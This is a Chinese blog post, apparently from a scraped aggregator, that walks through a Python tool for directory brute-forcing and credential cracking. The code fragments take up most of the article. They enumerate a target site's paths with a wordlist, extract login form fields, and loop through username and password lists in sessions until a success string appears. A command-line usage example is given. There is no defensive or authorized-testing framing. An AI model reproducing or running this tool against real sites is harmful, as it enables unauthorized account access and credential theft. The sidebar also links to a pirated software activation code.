首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

python遍历路径破解表单的示例

Posted in Python onNovember 21, 2020

首先是利用python遍历路径,采用字典爆破的形式,当然如果只是单纯的爆破路径,简单写一个多线程脚本就行了。这里考虑如何对爆破到的路径进行第二步利用,此处尝试对猜解到的路径进行表单发现及登陆爆破处理。

​首先就是路径爆破,采用多线程队列,爆破路径,判断形式为200响应码。

while not self._queue.empty():
      queue = self._queue.get(timeout=0.5)
      try:
        r = requests.get(self.url+queue,timeout=5, headers=self.headers)
        if r.status_code == 200:
          print "[200] %s" %(queue)
          soup = BeautifulSoup(r.content,'html.parser')
          if soup.find('form'):
            self.brute(soup, queue)

猜解到路径后交给brute方法处理,方法实现了一个css选择器,获取form表单中的input字段标签,提取标签参数组合成post参数值,然后提取表单中的action跳转页面,如没有页面默认在当前表单页提交。

input = soup.select("form input")
      for i in input:
        try:
          if i.attrs['type'] == "hidden":
            name, value = i.attrs['name'], i.attrs['value']
            list_post.append(name+'='+value)
          elif i.attrs['type'] == 'password':
            name = i.attrs['name']
            list_post.append(name+'=$$$')
          else:
            name = i.attrs['name']
            list_post.append(name+'=%%%')
        except:
          continue
      for i in list_post:
        post = post + i + '&'
      action = soup.find_all('form')
      for i in action:
        if i['action']:
          actiontag = i['action']
        else:
          actiontag = queue
      self.payload(post, actiontag)

获取参数值后,交给payload方法处理登陆,采用requests库的session登陆。获取cookie,先采用session请求获取cookie后,再采用session携带cookie进行请求提交。然后对输入的验证值进行判断是否为登陆成功。

for name in self.username():
      post_user = post.replace('%%%',name.strip())
      for pwd in self.password():
        post_pwd = post_user.replace('$$$',pwd.strip())
        session = requests.Session()
        session.get(self.url+'/'+action, headers=self.headers, verify=False)
        r = session.post(self.url+'/'+action, data=post_pwd, headers=self.headers, verify=False)
        if self.word in r.content:
          print '[username] %s' %name +'\r' + '[password] %s' %pwd
          return

为了判断是否登陆成功,采用的人为输入判断字符串的形式。也就是脚本执行形式为

python xxx.py http://xxxx.com xxxxx

以上就是python遍历路径破解表单的示例的详细内容,更多关于python 破解表单的资料请关注三水点靠木其它相关文章!

python遍历路径破解表单的示例

- Author -

Misaki''s

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
Python批量重命名同一文件夹下文件的方法
May 25 Python
Python制作爬虫采集小说
Oct 25 Python
python获取代理IP的实例分享
May 07 Python
Django中的文件的上传的几种方式
Jul 23 Python
对python生成业务报表的实例详解
Feb 03 Python
Python写一个基于MD5的文件监听程序
Mar 11 Python
Python3 chardet模块查看编码格式的例子
Aug 14 Python
python3利用Axes3D库画3D模型图
Mar 25 Python
python小白切忌乱用表达式
May 29 Python
Django配置跨域并开发测试接口
Nov 04 Python
python 实现"神经衰弱"翻牌游戏
Nov 09 Python
python lambda 表达式形式分析
Apr 03 Python
Python如何批量生成和调用变量
Nov 21 #Python
在终端启动Python时报错的解决方案
Nov 20 #Python
python 批量下载bilibili视频的gui程序
Nov 20 #Python
Python ellipsis 的用法详解
Nov 20 #Python
python 动态渲染 mysql 配置文件的示例
Nov 20 #Python
Python paramiko使用方法代码汇总
Nov 20 #Python
分享一枚pycharm激活码适用所有pycharm版本我的pycharm2020.2.3激活成功
Nov 20 #Python
东方异文石(1) 最终幻想(1) 艾尔登法环(1) 巫师(1) 暴雪(1) 战锤40K(1) 小缇娜的奇幻之地(1) 我的世界(1) LOL(1) 守望先锋(1)
You might like
处理(php-cgi.exe - FastCGI 进程超过了配置的请求超时时限)的问题
2013/07/03 PHP
php header功能的使用
2013/10/28 PHP
PHP预定义接口――Iterator用法示例
2020/06/05 PHP
JavaScript 对话框和状态栏使用说明
2009/10/25 Javascript
DOM2非标准但却支持很好的几个属性小结
2012/01/21 Javascript
html向js方法传递参数具体实现
2013/08/08 Javascript
节点的插入之append()和appendTo()的用法介绍
2014/01/13 Javascript
JS跨域问题详解
2014/11/25 Javascript
详解AngularJs中$sce与$sceDelegate上下文转义服务
2016/09/21 Javascript
jQuery UI仿淘宝搜索下拉列表功能
2017/01/10 Javascript
原生和jQuery的ajax用法详解
2017/01/23 Javascript
原生js和css实现图片轮播效果
2017/02/07 Javascript
jQuery基于事件控制实现点击显示内容下拉效果
2017/03/07 Javascript
基于vue-element组件实现音乐播放器功能
2018/05/06 Javascript
js实现随机数小游戏
2019/06/28 Javascript
angularjs自定义过滤器demo示例
2019/08/24 Javascript
JS数组的高级使用方法示例小结
2020/03/14 Javascript
谈谈JavaScript中的垃圾回收机制
2020/09/17 Javascript
零基础写python爬虫之使用Scrapy框架编写爬虫
2014/11/07 Python
浅谈Pandas 排序之后索引的问题
2018/06/07 Python
Mac 使用python3的matplot画图不显示的解决
2019/11/23 Python
Pandas实现dataframe和np.array的相互转换
2019/11/30 Python
python带参数打包exe及调用方式
2019/12/21 Python
python实现简单飞行棋
2020/02/06 Python
以设计师精品品质提供快速时尚:PopJulia
2018/01/09 全球购物
德国高尔夫商店:Par71.de
2020/11/29 全球购物
传播学专业毕业生自荐信
2013/11/04 职场文书
招商业务员岗位职责
2013/12/16 职场文书
二手书店创业计划书
2014/01/16 职场文书
坚定理想信念心得体会
2014/03/11 职场文书
人力资源管理专业应届生求职信
2014/04/24 职场文书
移交协议书
2014/08/19 职场文书
终止劳动合同通知书
2015/04/16 职场文书
古诗之感恩老师
2019/10/24 职场文书
ORM模型框架操作mysql数据库的方法
2021/07/25 MySQL
Spring-cloud Config Server的3种配置方式
2021/09/25 Java/Android